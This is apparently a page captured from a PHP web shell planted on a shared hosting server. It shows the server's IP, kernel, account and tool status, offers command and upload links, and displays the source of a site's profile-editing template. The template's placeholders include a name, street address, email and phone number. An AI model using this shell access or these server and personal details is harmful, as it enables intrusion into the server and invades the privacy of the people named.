Server IP : 162.214.80.37 / Your IP : 216.73.216.83 Web Server : Apache System : Linux sh013.webhostingservices.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : imyrqtmy ( 2189) PHP Version : 8.2.18 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/imyrqtmy/public_html/ss/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!doctype html> <html lang="en"> <head> <?php include 'includes/title.php';?> </head> <body id="body"> <!-- scroll top --> <div class="circle-container"> <svg width="16" height="16" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg"> <g> <path fill-rule="evenodd" clip-rule="evenodd" d="M7.03516 0.416666L7.03516 15H8.28516L8.28516 0.416666H7.03516Z" /> <path fill-rule="evenodd" clip-rule="evenodd" d="M8.28516 1.04115C8.28516 3.98115 5.70016 6.38281 2.94349 6.38281H2.31849V5.13281H2.94349C5.03599 5.13281 7.03516 3.26448 7.03516 1.04115V0.416979H8.28516V1.04115Z" /> <path fill-rule="evenodd" clip-rule="evenodd" d="M7.03333 1.04115C7.03333 3.98115 9.61833 6.38281 12.375 6.38281H13V5.13281H12.375C10.2817 5.13281 8.28333 3.26448 8.28333 1.04115V0.416979H7.03333V1.04115Z" /> </g> </svg> </div> <?php include 'includes/header.php';?> <!-- Start Breadcrumb section --> <div class="breadcrumb-section two" style="background-image:linear-gradient(rgba(11, 12, 12, 0.6), rgba(11, 12, 12, 0.6)), url(assets/img/inner-pages/breadcrumb-bg2.jpg);"> <div class="container"> <div class="row"> <div class="col-lg-12"> <div class="banner-content"> <h1>Profile</h1> <ul class="breadcrumb-list"> <li><a href="index.html">Home</a></li> <li>Profile</li> </ul> </div> </div> </div> </div> </div> <!-- End Breadcrumb section --> <!-- Start Dashboard section --> <div class="dashboard-section pt-110 mb-110"> <div class="container"> <div class="dashboard-wrapper"> <?php include 'includes/dashsidebar.php';?> <div class="dashboard-content-wrap two"> <div class="settings-wrap"> <div class="edit-info-area"> <h6>Edit Your Information</h6> <form class="edit-info-form"> <div class="row"> <div class="col-md-12 mb-30"> <div class="form-inner"> <label> Name</label> <input type="text" placeholder="Md. Rofiqul"> </div> </div> <div class="col-md-12 mb-50"> <div class="form-inner"> <label>Your Address</label> <input type="text" placeholder="House 168/170, Road 02, Avenue 01, Mirpur DOHS, Dhaka, Bangladesh"> </div> </div> <div class="col-md-12 mb-30"> <div class="verify-area"> <div class="form-inner"> <label>Email Address</label> <input type="email" placeholder="shimanto.nits@gmail.com"> </div> <!-- <button class="primary-btn btn-hover two black-bg"> Verify Email <span></span> </button> --> </div> </div> <div class="col-md-12 mb-60"> <div class="verify-area"> <div class="form-inner"> <label>Phone Number</label> <input type="text" placeholder="+880 179 671 3831"> </div> <!-- <button class="primary-btn btn-hover two black-bg"> Verify Phone <span></span> </button> --> </div> </div> </div> <button class="primary-btn btn-hover two"> Save Changes <span></span> </button> </form> </div> </div> </div> </div> </div> </div> <!-- End Dashboard section --> <?php include 'includes/footer.php';?> </body> </html>